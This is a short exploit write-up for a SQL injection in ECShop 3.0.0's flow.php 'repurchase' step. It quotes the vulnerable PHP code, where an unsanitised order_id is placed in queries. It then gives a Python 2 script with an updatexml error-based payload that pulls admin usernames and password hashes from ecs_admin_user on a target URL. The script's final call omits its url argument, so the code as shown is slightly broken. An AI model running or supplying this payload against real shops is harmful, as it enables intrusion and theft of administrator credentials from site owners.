ecshop3.0.0注入

<?php
elseif ($_REQUEST['step'] == 'repurchase') {
include_once('includes/cls_json.php');
$order_id = strip_tags($_POST['order_id']);
$order_id = json_str_iconv($order_id);
$user_id = $_SESSION['user_id'];
$json  = new JSON;
$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
if (!$order) {
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
die($json->encode($result));
}

$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
$result = array('error' => 0, 'message' => '');
foreach ($order_goods as $goods) {
$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
$result = false;
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
}
}
die($json->encode($result));
}

#coding:utf-8
#ecshop 3.0.0 flow.php sql injection
#author:jwong

import requests
import re
import sys

def get_md5(url):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0"
}
payload = {"order_id":"1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e) from ecs_admin_user),1)#"
}
urls = url + '/flow.php?step=repurchase'

req = requests.post(urls,data=payload,headers=headers)
print req.content

if req.status_code == 200 and req:
pattern = re.compile("XPATH syntax error: '(.*?)'")
info = re.findall(pattern,req.content)[0]
new_list = info.split(':')
password = new_list[-1]
username = new_list[1]
print username + ':' + password

if __name__ == '__main__':
if len(sys.argv) < 2:
print 'usage python ecshop.py url'
exit()
url = sys.argv[1]
if 'http://' not in url:
url = 'http://' + url
get_md5()